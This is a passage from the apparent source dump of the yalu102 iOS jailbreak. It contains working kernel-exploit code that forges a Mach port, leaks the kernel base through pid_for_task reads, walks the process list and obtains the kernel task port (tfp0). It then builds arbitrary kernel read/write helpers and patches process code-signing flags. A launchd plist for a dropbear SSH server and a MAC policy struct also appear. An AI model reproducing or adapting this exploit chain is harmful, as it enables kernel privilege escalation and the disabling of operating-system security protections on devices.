i++) { 234 | if (ports[i]) { 235 | msg1.head.msgh_local_port = ports[i]; 236 | pthread_yield_np(); 237 | kern_return_t kret = mach_msg(&msg1, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); 238 | assert(kret==0); 239 | for (int k = 0; k < msg1.msgh_body.msgh_descriptor_count; k++) { 240 | mach_port_t* ptz = msg1.desc[k].address; 241 | for (int z = 0; z < 0x100/8; z++) { 242 | if (ptz[z] != MACH_PORT_DEAD) { 243 | if (ptz[z]) { 244 | foundport = ptz[z]; 245 | goto foundp; 246 | } 247 | 248 | } 249 | } 250 | } 251 | mach_msg_destroy(&msg1.head); 252 | mach_port_deallocate(mach_task_self(), ports[i]); 253 | ports[i] = 0; 254 | } 255 | } 256 | [sender setTitle:@"failed, retry" forState:UIControlStateNormal]; 257 | return; 258 | 259 | foundp: 260 | NSLog(@"found corruption %x", foundport); 261 | 262 | uint64_t textbase = 0xfffffff007004000; 263 | 264 | for (int i = 0; i < 0x300; i++) { 265 | for (int k = 0; k < 0x40000; k+=8) { 266 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = textbase + i*0x100000 + 0x500000 + k; 267 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 268 | 269 | kern_return_t kret = clock_sleep_trap(foundport, 0, 0, 0, 0); 270 | 271 | if (kret != KERN_FAILURE) { 272 | goto gotclock; 273 | } 274 | } 275 | } 276 | [sender setTitle:@"failed, retry" forState:UIControlStateNormal]; 277 | return; 278 | 279 | gotclock:; 280 | uint64_t leaked_ptr = *(uint64_t*)(((uint64_t)fakeport) + 0x68); 281 | 282 | leaked_ptr &= ~0x3FFF; 283 | 284 | fakeport->io_bits = IKOT_TASK|IO_BITS_ACTIVE; 285 | fakeport->io_references = 0xff; 286 | char* faketask = ((char*)fakeport) + 0x1000; 287 | 288 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; 289 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 290 | *(uint64_t*) (faketask + 0x10) = 0xee; 291 | 292 | while (1) { 293 | int32_t leaked = 0; 294 | *(uint64_t*) (faketask + procoff) = leaked_ptr - 0x10; 295 | pid_for_task(foundport, &leaked); 296 | if (leaked == MH_MAGIC_64) { 297 | NSLog(@"found kernel text at %llx", leaked_ptr); 298 | break; 299 | } 300 | leaked_ptr -= 0x4000; 301 | } 302 | 303 | uint64_t kernel_base = leaked_ptr; 304 | 305 | uint64_t allproc = allproc_offset + kernel_base; 306 | 307 | uint64_t proc_ = allproc; 308 | 309 | uint64_t myproc = 0; 310 | uint64_t kernproc = 0; 311 | 312 | while (proc_) { 313 | uint64_t proc = 0; 314 | 315 | *(uint64_t*) (faketask + procoff) = proc_ - 0x10; 316 | pid_for_task(foundport, (int32_t*)&proc); 317 | *(uint64_t*) (faketask + procoff) = 4 + proc_ - 0x10; 318 | pid_for_task(foundport, (int32_t*)(((uint64_t)(&proc)) + 4)); 319 | 320 | int pd = 0; 321 | *(uint64_t*) (faketask + procoff) = proc; 322 | pid_for_task(foundport, &pd); 323 | 324 | if (pd == getpid()) { 325 | myproc = proc; 326 | } else if (pd == 0){ 327 | kernproc = proc; 328 | } 329 | proc_ = proc; 330 | } 331 | 332 | 333 | uint64_t kern_task = 0; 334 | *(uint64_t*) (faketask + procoff) = kernproc - 0x10 + 0x18; 335 | pid_for_task(foundport, (int32_t*)&kern_task); 336 | *(uint64_t*) (faketask + procoff) = 4 + kernproc - 0x10 + 0x18; 337 | pid_for_task(foundport, (int32_t*)(((uint64_t)(&kern_task)) + 4)); 338 | 339 | uint64_t itk_kern_sself = 0; 340 | *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + 0xe8; 341 | pid_for_task(foundport, (int32_t*)&itk_kern_sself); 342 | *(uint64_t*) (faketask + procoff) = 4 + kern_task - 0x10 + 0xe8; 343 | pid_for_task(foundport, (int32_t*)(((uint64_t)(&itk_kern_sself)) + 4)); 344 | 345 | char* faketaskport = malloc(0x1000); 346 | char* ktaskdump = malloc(0x1000); 347 | 348 | for (int i = 0; i < 0x1000/4; i++) { 349 | *(uint64_t*) (faketask + procoff) = itk_kern_sself - 0x10 + i*4; 350 | pid_for_task(foundport, (int32_t*)(&faketaskport[i*4])); 351 | } 352 | for (int i = 0; i < 0x1000/4; i++) { 353 | *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + i*4; 354 | pid_for_task(foundport, (int32_t*)(&ktaskdump[i*4])); 355 | } 356 | 357 | memcpy(fakeport, faketaskport, 0x1000); 358 | memcpy(faketask, ktaskdump, 0x1000); 359 | 360 | mach_port_t pt = 0; 361 | 362 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; 363 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 364 | 365 | *(uint64_t*)(((uint64_t)faketask) + 0x2b8) = itk_kern_sself; 366 | 367 | task_get_special_port(foundport, 4, &pt); // get tfp0 368 | NSLog(@"got tfp0 -> %x", pt); 369 | fakeport->io_bits = 0; 370 | 371 | extern uint64_t slide; 372 | slide = kernel_base - 0xFFFFFFF007004000; 373 | 374 | void exploit(void*, mach_port_t, uint64_t, uint64_t); 375 | exploit(sender, pt, kernel_base, allproc_offset); 376 | [dope setEnabled:NO]; 377 | [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; 378 | 379 | } 380 | 381 | - (void)didReceiveMemoryWarning { 382 | [super didReceiveMemoryWarning]; 383 | // Dispose of any resources that can be recreated. 384 | } 385 | 386 | 387 | @end 388 | -------------------------------------------------------------------------------- /yalu102/bootstrap.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/bootstrap.tar -------------------------------------------------------------------------------- /yalu102/devicesupport.h: -------------------------------------------------------------------------------- 1 | #ifndef devicesupport_h 2 | #define devicesupport_h 3 | 4 | 5 | 6 | //0xFFFFFFF0075F6000+0x50 (0xfffffff006e4d620+0x4bc0) 7 | 8 | #define G(type) constget(type) 9 | #define S(type, val) constset(type,val) 10 | 11 | #define CS_VALID 0x0000001 /* dynamically valid */ 12 | #define CS_ADHOC 0x0000002 /* ad hoc signed */ 13 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 14 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 15 | 16 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 17 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */ 18 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ 19 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 20 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */ 21 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */ 22 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000 23 | 24 | #define CS_ALLOWED_MACHO 0x00ffffe 25 | 26 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ 27 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ 28 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ 29 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ 30 | 31 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ 32 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ 33 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 34 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ 35 | 36 | uint64_t constget(int idx); 37 | #import 38 | struct mac_policy_ops{ 39 | uint64_t mpo_audit_check_postselect; 40 | uint64_t mpo_audit_check_preselect; 41 | uint64_t mpo_bpfdesc_label_associate; 42 | uint64_t mpo_bpfdesc_label_destroy; 43 | uint64_t mpo_bpfdesc_label_init; 44 | uint64_t mpo_bpfdesc_check_receive; 45 | uint64_t mpo_cred_check_label_update_execve; 46 | uint64_t mpo_cred_check_label_update; 47 | uint64_t mpo_cred_check_visible; 48 | uint64_t mpo_cred_label_associate_fork; 49 | uint64_t mpo_cred_label_associate_kernel; 50 | uint64_t mpo_cred_label_associate; 51 | uint64_t mpo_cred_label_associate_user; 52 | uint64_t mpo_cred_label_destroy; 53 | uint64_t mpo_cred_label_externalize_audit; 54 | uint64_t mpo_cred_label_externalize; 55 | uint64_t mpo_cred_label_init; 56 | uint64_t mpo_cred_label_internalize; 57 | uint64_t mpo_cred_label_update_execve; 58 | uint64_t mpo_cred_label_update; 59 | uint64_t mpo_devfs_label_associate_device; 60 | uint64_t mpo_devfs_label_associate_directory; 61 | uint64_t mpo_devfs_label_copy; 62 | uint64_t mpo_devfs_label_destroy; 63 | uint64_t mpo_devfs_label_init; 64 | uint64_t mpo_devfs_label_update; 65 | uint64_t mpo_file_check_change_offset; 66 | uint64_t mpo_file_check_create; 67 | uint64_t mpo_file_check_dup; 68 | uint64_t mpo_file_check_fcntl; 69 | uint64_t mpo_file_check_get_offset; 70 | uint64_t mpo_file_check_get; 71 | uint64_t mpo_file_check_inherit; 72 | uint64_t mpo_file_check_ioctl; 73 | uint64_t mpo_file_check_lock; 74 | uint64_t mpo_file_check_mmap_downgrade; 75 | uint64_t mpo_file_check_mmap; 76 | uint64_t mpo_file_check_receive; 77 | uint64_t mpo_file_check_set; 78 | uint64_t mpo_file_label_init; 79 | uint64_t mpo_file_label_destroy; 80 | uint64_t mpo_file_label_associate; 81 | uint64_t mpo_ifnet_check_label_update; 82 | uint64_t mpo_ifnet_check_transmit; 83 | uint64_t mpo_ifnet_label_associate; 84 | uint64_t mpo_ifnet_label_copy; 85 | uint64_t mpo_ifnet_label_destroy; 86 | uint64_t mpo_ifnet_label_externalize; 87 | uint64_t mpo_ifnet_label_init; 88 | uint64_t mpo_ifnet_label_internalize; 89 | uint64_t mpo_ifnet_label_update; 90 | uint64_t mpo_ifnet_label_recycle; 91 | uint64_t mpo_inpcb_check_deliver; 92 | uint64_t mpo_inpcb_label_associate; 93 | uint64_t mpo_inpcb_label_destroy; 94 | uint64_t mpo_inpcb_label_init; 95 | uint64_t mpo_inpcb_label_recycle; 96 | uint64_t mpo_inpcb_label_update; 97 | uint64_t mpo_iokit_check_device; 98 | uint64_t mpo_ipq_label_associate; 99 | uint64_t mpo_ipq_label_compare; 100 | uint64_t mpo_ipq_label_destroy; 101 | uint64_t mpo_ipq_label_init; 102 | uint64_t mpo_ipq_label_update; 103 | uint64_t mpo_file_check_library_validation; 104 | uint64_t mpo_vnode_notify_setacl; 105 | uint64_t mpo_vnode_notify_setattrlist; 106 | uint64_t mpo_vnode_notify_setextattr; 107 | uint64_t mpo_vnode_notify_setflags; 108 | uint64_t mpo_vnode_notify_setmode; 109 | uint64_t mpo_vnode_notify_setowner; 110 | uint64_t mpo_vnode_notify_setutimes; 111 | uint64_t mpo_vnode_notify_truncate; 112 | uint64_t mpo_mbuf_label_associate_bpfdesc; 113 | uint64_t mpo_mbuf_label_associate_ifnet; 114 | uint64_t mpo_mbuf_label_associate_inpcb; 115 | uint64_t mpo_mbuf_label_associate_ipq; 116 | uint64_t mpo_mbuf_label_associate_linklayer; 117 | uint64_t mpo_mbuf_label_associate_multicast_encap; 118 | uint64_t mpo_mbuf_label_associate_netlayer; 119 | uint64_t mpo_mbuf_label_associate_socket; 120 | uint64_t mpo_mbuf_label_copy; 121 | uint64_t mpo_mbuf_label_destroy; 122 | uint64_t mpo_mbuf_label_init; 123 | uint64_t mpo_mount_check_fsctl; 124 | uint64_t mpo_mount_check_getattr; 125 | uint64_t mpo_mount_check_label_update; 126 | uint64_t mpo_mount_check_mount; 127 | uint64_t mpo_mount_check_remount; 128 | uint64_t mpo_mount_check_setattr; 129 | uint64_t mpo_mount_check_stat; 130 | uint64_t mpo_mount_check_umount; 131 | uint64_t mpo_mount_label_associate; 132 | uint64_t mpo_mount_label_destroy; 133 | uint64_t mpo_mount_label_externalize; 134 | uint64_t mpo_mount_label_init; 135 | uint64_t mpo_mount_label_internalize; 136 | uint64_t mpo_netinet_fragment; 137 | uint64_t mpo_netinet_icmp_reply; 138 | uint64_t mpo_netinet_tcp_reply; 139 | uint64_t mpo_pipe_check_ioctl; 140 | uint64_t mpo_pipe_check_kqfilter; 141 | uint64_t mpo_pipe_check_label_update; 142 | uint64_t mpo_pipe_check_read; 143 | uint64_t mpo_pipe_check_select; 144 | uint64_t mpo_pipe_check_stat; 145 | uint64_t mpo_pipe_check_write; 146 | uint64_t mpo_pipe_label_associate; 147 | uint64_t mpo_pipe_label_copy; 148 | uint64_t mpo_pipe_label_destroy; 149 | uint64_t mpo_pipe_label_externalize; 150 | uint64_t mpo_pipe_label_init; 151 | uint64_t mpo_pipe_label_internalize; 152 | uint64_t mpo_pipe_label_update; 153 | uint64_t mpo_policy_destroy; 154 | uint64_t mpo_policy_init; 155 | uint64_t mpo_policy_initbsd; 156 | uint64_t mpo_policy_syscall; 157 | uint64_t mpo_system_check_sysctlbyname; 158 | uint64_t mpo_proc_check_inherit_ipc_ports; 159 | uint64_t mpo_vnode_check_rename; 160 | uint64_t mpo_kext_check_query; 161 | uint64_t mpo_iokit_check_nvram_get; 162 | uint64_t mpo_iokit_check_nvram_set; 163 | uint64_t mpo_iokit_check_nvram_delete; 164 | uint64_t mpo_proc_check_expose_task; 165 | uint64_t mpo_proc_check_set_host_special_port; 166 | uint64_t mpo_proc_check_set_host_exception_port; 167 | uint64_t mpo_exc_action_check_exception_send; 168 | uint64_t mpo_exc_action_label_associate; 169 | uint64_t mpo_exc_action_label_copy; 170 | uint64_t mpo_exc_action_label_destroy; 171 | uint64_t mpo_exc_action_label_init; 172 | uint64_t mpo_exc_action_label_update; 173 | uint64_t mpo_reserved1; 174 | uint64_t mpo_reserved2; 175 | uint64_t mpo_reserved3; 176 | uint64_t mpo_reserved4; 177 | uint64_t mpo_reserved5; 178 | uint64_t mpo_reserved6; 179 | uint64_t mpo_posixsem_check_create; 180 | uint64_t mpo_posixsem_check_open; 181 | uint64_t mpo_posixsem_check_post; 182 | uint64_t mpo_posixsem_check_unlink; 183 | uint64_t mpo_posixsem_check_wait; 184 | uint64_t mpo_posixsem_label_associate; 185 | uint64_t mpo_posixsem_label_destroy; 186 | uint64_t mpo_posixsem_label_init; 187 | uint64_t mpo_posixshm_check_create; 188 | uint64_t mpo_posixshm_check_mmap; 189 | uint64_t mpo_posixshm_check_open; 190 | uint64_t mpo_posixshm_check_stat; 191 | uint64_t mpo_posixshm_check_truncate; 192 | uint64_t mpo_posixshm_check_unlink; 193 | uint64_t mpo_posixshm_label_associate; 194 | uint64_t mpo_posixshm_label_destroy; 195 | uint64_t mpo_posixshm_label_init; 196 | uint64_t mpo_proc_check_debug; 197 | uint64_t mpo_proc_check_fork; 198 | uint64_t mpo_proc_check_get_task_name; 199 | uint64_t mpo_proc_check_get_task; 200 | uint64_t mpo_proc_check_getaudit; 201 | uint64_t mpo_proc_check_getauid; 202 | uint64_t mpo_proc_check_getlcid; 203 | uint64_t mpo_proc_check_mprotect; 204 | uint64_t mpo_proc_check_sched; 205 | uint64_t mpo_proc_check_setaudit; 206 | uint64_t mpo_proc_check_setauid; 207 | uint64_t mpo_proc_check_setlcid; 208 | uint64_t mpo_proc_check_signal; 209 | uint64_t mpo_proc_check_wait; 210 | uint64_t mpo_proc_label_destroy; 211 | uint64_t mpo_proc_label_init; 212 | uint64_t mpo_socket_check_accept; 213 | uint64_t mpo_socket_check_accepted; 214 | uint64_t mpo_socket_check_bind; 215 | uint64_t mpo_socket_check_connect; 216 | uint64_t mpo_socket_check_create; 217 | uint64_t mpo_socket_check_deliver; 218 | uint64_t mpo_socket_check_kqfilter; 219 | uint64_t mpo_socket_check_label_update; 220 | uint64_t mpo_socket_check_listen; 221 | uint64_t mpo_socket_check_receive; 222 | uint64_t mpo_socket_check_received; 223 | uint64_t mpo_socket_check_select; 224 | uint64_t mpo_socket_check_send; 225 | uint64_t mpo_socket_check_stat; 226 | uint64_t mpo_socket_check_setsockopt; 227 | uint64_t mpo_socket_check_getsockopt; 228 | uint64_t mpo_socket_label_associate_accept; 229 | uint64_t mpo_socket_label_associate; 230 | uint64_t mpo_socket_label_copy; 231 | uint64_t mpo_socket_label_destroy; 232 | uint64_t mpo_socket_label_externalize; 233 | uint64_t mpo_socket_label_init; 234 | uint64_t mpo_socket_label_internalize; 235 | uint64_t mpo_socket_label_update; 236 | uint64_t mpo_socketpeer_label_associate_mbuf; 237 | uint64_t mpo_socketpeer_label_associate_socket; 238 | uint64_t mpo_socketpeer_label_destroy; 239 | uint64_t mpo_socketpeer_label_externalize; 240 | uint64_t mpo_socketpeer_label_init; 241 | uint64_t mpo_system_check_acct; 242 | uint64_t mpo_system_check_audit; 243 | uint64_t mpo_system_check_auditctl; 244 | uint64_t mpo_system_check_auditon; 245 | uint64_t mpo_system_check_host_priv; 246 | uint64_t mpo_system_check_nfsd; 247 | uint64_t mpo_system_check_reboot; 248 | uint64_t mpo_system_check_settime; 249 | uint64_t mpo_system_check_swapoff; 250 | uint64_t mpo_system_check_swapon; 251 | uint64_t mpo_reserved7; 252 | uint64_t mpo_sysvmsg_label_associate; 253 | uint64_t mpo_sysvmsg_label_destroy; 254 | uint64_t mpo_sysvmsg_label_init; 255 | uint64_t mpo_sysvmsg_label_recycle; 256 | uint64_t mpo_sysvmsq_check_enqueue; 257 | uint64_t mpo_sysvmsq_check_msgrcv; 258 | uint64_t mpo_sysvmsq_check_msgrmid; 259 | uint64_t mpo_sysvmsq_check_msqctl; 260 | uint64_t mpo_sysvmsq_check_msqget; 261 | uint64_t mpo_sysvmsq_check_msqrcv; 262 | uint64_t mpo_sysvmsq_check_msqsnd; 263 | uint64_t mpo_sysvmsq_label_associate; 264 | uint64_t mpo_sysvmsq_label_destroy; 265 | uint64_t mpo_sysvmsq_label_init; 266 | uint64_t mpo_sysvmsq_label_recycle; 267 | uint64_t mpo_sysvsem_check_semctl; 268 | uint64_t mpo_sysvsem_check_semget; 269 | uint64_t mpo_sysvsem_check_semop; 270 | uint64_t mpo_sysvsem_label_associate; 271 | uint64_t mpo_sysvsem_label_destroy; 272 | uint64_t mpo_sysvsem_label_init; 273 | uint64_t mpo_sysvsem_label_recycle; 274 | uint64_t mpo_sysvshm_check_shmat; 275 | uint64_t mpo_sysvshm_check_shmctl; 276 | uint64_t mpo_sysvshm_check_shmdt; 277 | uint64_t mpo_sysvshm_check_shmget; 278 | uint64_t mpo_sysvshm_label_associate; 279 | uint64_t mpo_sysvshm_label_destroy; 280 | uint64_t mpo_sysvshm_label_init; 281 | uint64_t mpo_sysvshm_label_recycle; 282 | uint64_t mpo_reserved8; 283 | uint64_t mpo_reserved9; 284 | uint64_t mpo_vnode_check_getattr; 285 | uint64_t mpo_mount_check_snapshot_create; 286 | uint64_t mpo_mount_check_snapshot_delete; 287 | uint64_t mpo_vnode_check_clone; 288 | uint64_t mpo_proc_check_get_cs_info; 289 | uint64_t mpo_proc_check_set_cs_info; 290 | uint64_t mpo_iokit_check_hid_control; 291 | uint64_t mpo_vnode_check_access; 292 | uint64_t mpo_vnode_check_chdir; 293 | uint64_t mpo_vnode_check_chroot; 294 | uint64_t mpo_vnode_check_create; 295 | uint64_t mpo_vnode_check_deleteextattr; 296 | uint64_t mpo_vnode_check_exchangedata; 297 | uint64_t mpo_vnode_check_exec; 298 | uint64_t mpo_vnode_check_getattrlist; 299 | uint64_t mpo_vnode_check_getextattr; 300 | uint64_t mpo_vnode_check_ioctl; 301 | uint64_t mpo_vnode_check_kqfilter; 302 | uint64_t mpo_vnode_check_label_update; 303 | uint64_t mpo_vnode_check_link; 304 | uint64_t mpo_vnode_check_listextattr; 305 | uint64_t mpo_vnode_check_lookup; 306 | uint64_t mpo_vnode_check_open; 307 | uint64_t mpo_vnode_check_read; 308 | uint64_t mpo_vnode_check_readdir; 309 | uint64_t mpo_vnode_check_readlink; 310 | uint64_t mpo_vnode_check_rename_from; 311 | uint64_t mpo_vnode_check_rename_to; 312 | uint64_t mpo_vnode_check_revoke; 313 | uint64_t mpo_vnode_check_select; 314 | uint64_t mpo_vnode_check_setattrlist; 315 | uint64_t mpo_vnode_check_setextattr; 316 | uint64_t mpo_vnode_check_setflags; 317 | uint64_t mpo_vnode_check_setmode; 318 | uint64_t mpo_vnode_check_setowner; 319 | uint64_t mpo_vnode_check_setutimes; 320 | uint64_t mpo_vnode_check_stat; 321 | uint64_t mpo_vnode_check_truncate; 322 | uint64_t mpo_vnode_check_unlink; 323 | uint64_t mpo_vnode_check_write; 324 | uint64_t mpo_vnode_label_associate_devfs; 325 | uint64_t mpo_vnode_label_associate_extattr; 326 | uint64_t mpo_vnode_label_associate_file; 327 | uint64_t mpo_vnode_label_associate_pipe; 328 | uint64_t mpo_vnode_label_associate_posixsem; 329 | uint64_t mpo_vnode_label_associate_posixshm; 330 | uint64_t mpo_vnode_label_associate_singlelabel; 331 | uint64_t mpo_vnode_label_associate_socket; 332 | uint64_t mpo_vnode_label_copy; 333 | uint64_t mpo_vnode_label_destroy; 334 | uint64_t mpo_vnode_label_externalize_audit; 335 | uint64_t mpo_vnode_label_externalize; 336 | uint64_t mpo_vnode_label_init; 337 | uint64_t mpo_vnode_label_internalize; 338 | uint64_t mpo_vnode_label_recycle; 339 | uint64_t mpo_vnode_label_store; 340 | uint64_t mpo_vnode_label_update_extattr; 341 | uint64_t mpo_vnode_label_update; 342 | uint64_t mpo_vnode_notify_create; 343 | uint64_t mpo_vnode_check_signature; 344 | uint64_t mpo_vnode_check_uipc_bind; 345 | uint64_t mpo_vnode_check_uipc_connect; 346 | uint64_t mpo_proc_check_run_cs_invalid; 347 | uint64_t mpo_proc_check_suspend_resume; 348 | uint64_t mpo_thread_userret; 349 | uint64_t mpo_iokit_check_set_properties; 350 | uint64_t mpo_system_check_chud; 351 | uint64_t mpo_vnode_check_searchfs; 352 | uint64_t mpo_priv_check; 353 | uint64_t mpo_priv_grant; 354 | uint64_t mpo_proc_check_map_anon; 355 | uint64_t mpo_vnode_check_fsgetpath; 356 | uint64_t mpo_iokit_check_open; 357 | uint64_t mpo_proc_check_ledger; 358 | uint64_t mpo_vnode_notify_rename; 359 | uint64_t mpo_vnode_check_setacl; 360 | uint64_t mpo_vnode_notify_deleteextattr; 361 | uint64_t mpo_system_check_kas_info; 362 | uint64_t mpo_proc_check_cpumon; 363 | uint64_t mpo_vnode_notify_open; 364 | uint64_t mpo_system_check_info; 365 | uint64_t mpo_pty_notify_grant; 366 | uint64_t mpo_pty_notify_close; 367 | uint64_t mpo_vnode_find_sigs; 368 | uint64_t mpo_kext_check_load; 369 | uint64_t mpo_kext_check_unload; 370 | uint64_t mpo_proc_check_proc_info; 371 | uint64_t mpo_vnode_notify_link; 372 | uint64_t mpo_iokit_check_filter_properties; 373 | uint64_t mpo_iokit_check_get_property; 374 | }; 375 | 376 | 377 | 378 | #endif /* devicesupport_h */ 379 | -------------------------------------------------------------------------------- /yalu102/devicesupport.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import "devicesupport.h" 3 | #import 4 | #import 5 | 6 | 7 | NSMutableArray* consttable = nil; 8 | NSMutableArray* collide = nil; 9 | int constload() { 10 | struct utsname uts; 11 | uname(&uts); 12 | if (strstr(uts.version, "Marijuan")) { 13 | return -2; 14 | } 15 | 16 | NSString* strv = [NSString stringWithUTF8String:uts.version]; 17 | NSArray *dp =[[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"def" ofType:@"plist"]]; 18 | int m = 0; 19 | collide = [NSMutableArray new]; 20 | 21 | for (NSDictionary* dict in dp) { 22 | if ([dict[@"vers"] isEqualToString:strv]) { 23 | [collide setObject:[NSMutableArray new] atIndexedSubscript:m]; 24 | int i = 0; 25 | for (NSString* str in dict[@"val"]) { 26 | [collide[m] setObject:[NSNumber numberWithUnsignedLongLong:strtoull([str UTF8String], 0, 0)] atIndexedSubscript:i]; 27 | i++; 28 | } 29 | m++; 30 | } 31 | } 32 | if (m) { 33 | return 0; 34 | } 35 | return -1; 36 | } 37 | char affine_const_by_surfacevt(uint64_t surfacevt_slid) 38 | { 39 | for (NSArray* arr in collide) { 40 | if ((surfacevt_slid & (0xfffff)) == ([[arr objectAtIndex:1] unsignedLongLongValue] & 0xfffff)) { 41 | NSLog(@"affined"); 42 | consttable = arr; 43 | return 0; 44 | } 45 | } 46 | return -1; 47 | } 48 | uint64_t constget(int idx){ 49 | return [[consttable objectAtIndex:idx] unsignedLongLongValue]; 50 | } 51 | -------------------------------------------------------------------------------- /yalu102/dropbear.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | ShaiHulud 7 | Program 8 | /usr/local/bin/dropbear 9 | ProgramArguments 10 | 11 | /usr/local/bin/dropbear 12 | -F 13 | -R 14 | -p 15 | 127.0.0.1:22 16 | 17 | RunAtLoad 18 | 19 | KeepAlive 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /yalu102/iokitmig64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/iokitmig64.o -------------------------------------------------------------------------------- /yalu102/jailbreak.m: -------------------------------------------------------------------------------- 1 | // 2 | // jailbreak.m 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 07/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import 10 | #undef __IPHONE_OS_VERSION_MIN_REQUIRED 11 | #import 12 | #import "devicesupport.h" 13 | 14 | #import 15 | #import 16 | #import 17 | #import 18 | #import 19 | #import 20 | 21 | #import "devicesupport.h" 22 | #import 23 | #import 24 | #import 25 | #import 26 | #import 27 | #import 28 | #import 29 | 30 | #import "patchfinder64.h" 31 | 32 | #define vm_address_t mach_vm_address_t 33 | 34 | mach_port_t tfp0=0; 35 | uint64_t slide=0; 36 | io_connect_t funcconn=0; 37 | // #define NSLog(...) 38 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); 39 | kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); 40 | kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); 41 | kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags); 42 | 43 | uint32_t FuncAnywhere32(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2) 44 | { 45 | return IOConnectTrap4(funcconn, 0, x1, x2, x0, addr); 46 | } 47 | 48 | void copyin(void* to, uint64_t from, size_t size) { 49 | mach_vm_size_t outsize = size; 50 | size_t szt = size; 51 | if (size > 0x1000) { 52 | size = 0x1000; 53 | } 54 | size_t off = 0; 55 | while (1) { 56 | mach_vm_read_overwrite(tfp0, off+from, size, (mach_vm_offset_t)(off+to), &outsize); 57 | szt -= size; 58 | off += size; 59 | if (szt == 0) { 60 | break; 61 | } 62 | size = szt; 63 | if (size > 0x1000) { 64 | size = 0x1000; 65 | } 66 | 67 | } 68 | } 69 | 70 | void copyout(uint64_t to, void* from, size_t size) { 71 | mach_vm_write(tfp0, to, (vm_offset_t)from, (mach_msg_type_number_t)size); 72 | } 73 | 74 | uint64_t ReadAnywhere64(uint64_t addr) { 75 | uint64_t val = 0; 76 | copyin(&val, addr, 8); 77 | return val; 78 | } 79 | 80 | uint64_t WriteAnywhere64(uint64_t addr, uint64_t val) { 81 | copyout(addr, &val, 8); 82 | return val; 83 | } 84 | 85 | uint32_t ReadAnywhere32(uint64_t addr) { 86 | uint32_t val = 0; 87 | copyin(&val, addr, 4); 88 | return val; 89 | } 90 | 91 | uint64_t WriteAnywhere32(uint64_t addr, uint32_t val) { 92 | copyout(addr, &val, 4); 93 | return val; 94 | } 95 | 96 | #import "pte_stuff.h" 97 | 98 | void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) 99 | { 100 | io_iterator_t iterator; 101 | IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"), &iterator); 102 | io_object_t servicex = IOIteratorNext(iterator); 103 | funcconn = 0; 104 | IOServiceOpen(servicex, mach_task_self(), 0, &funcconn); 105 | assert(funcconn); 106 | 107 | tfp0 = pt; 108 | 109 | uint64_t bsd_task=0; 110 | uint64_t launchd_task = 0; 111 | { 112 | uint64_t proc = ReadAnywhere64(allprocs+kernbase); 113 | NSLog(@"found procs at %llx", proc); 114 | while (proc) { 115 | uint32_t pid = ReadAnywhere32(proc+0x10); 116 | if (pid == getpid()) { 117 | bsd_task = proc; 118 | } else 119 | if (pid == 1) { 120 | launchd_task = proc; 121 | } 122 | 123 | if (launchd_task && bsd_task) break; 124 | 125 | proc = ReadAnywhere64(proc); 126 | } 127 | } 128 | uint64_t cred = ReadAnywhere64(bsd_task+0x100); 129 | 130 | uint64_t credpatch = 0; 131 | uint64_t proc = bsd_task; 132 | while (proc) { 133 | uint32_t pid = ReadAnywhere32(proc+0x10); 134 | uint32_t csflags = ReadAnywhere32(proc+0x2a8); 135 | csflags |= CS_PLATFORM_BINARY|CS_INSTALLER|CS_GET_TASK_ALLOW; 136 | csflags &= ~(CS_RESTRICT|CS_KILL|CS_HARD); 137 | WriteAnywhere32(proc+0x2a8, csflags); 138 | if (pid == 0) { 139 | credpatch = ReadAnywhere64(proc+0x100); 140 | break; 141 | } 142 | proc = ReadAnywhere64(proc); 143 | } 144 | 145 